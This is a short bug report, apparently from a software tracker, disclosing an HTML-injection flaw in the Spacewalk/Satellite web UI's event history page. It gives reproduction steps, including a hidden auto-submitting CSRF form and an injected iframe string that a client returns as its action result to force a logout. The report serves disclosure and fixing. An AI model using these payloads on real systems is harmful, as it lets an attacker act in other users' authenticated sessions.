Description of problem:
In case a registered client would return part of HTML text in the action
result to the server, Systems / Events / History page won't be able to quote
HTML tags in the event result details field properly (as in the browser would
process this text as if it would be part of the page).

We should be more careful about the data that flows from client to
server and not to trust it blindly.

Version-Release number of selected component (if applicable):
spacewalk-web-0.5.23-28

How reproducible:
Always

Steps to Reproduce:
1. Create a following HTML file on your system registered to Satellite:

<body onload="document.CSRF.submit()">
<form name="CSRF" method="GET"
action="https://your.satellite.org/rhn/Logout.do"
style="display:none">
</form>
</body>

2. Schedule an action on your client from Satellite webui (run a remote
command)
3. Make your client return this as a part of the action response:

</td></tr></table><iframe src="http://your.client.machine/your-page.html"><p><b>logged out</b></p></iframe>

4. Run the action from your client (rhn_check)
5. Visit the action result page

Actual results:
You will be logged out of your Satellite

Expected results:
Results will be rendered as an ordinary text (HTML tags will be quoted).

Additional info:
You can think of a more malicious scenarios (other than logging the user out).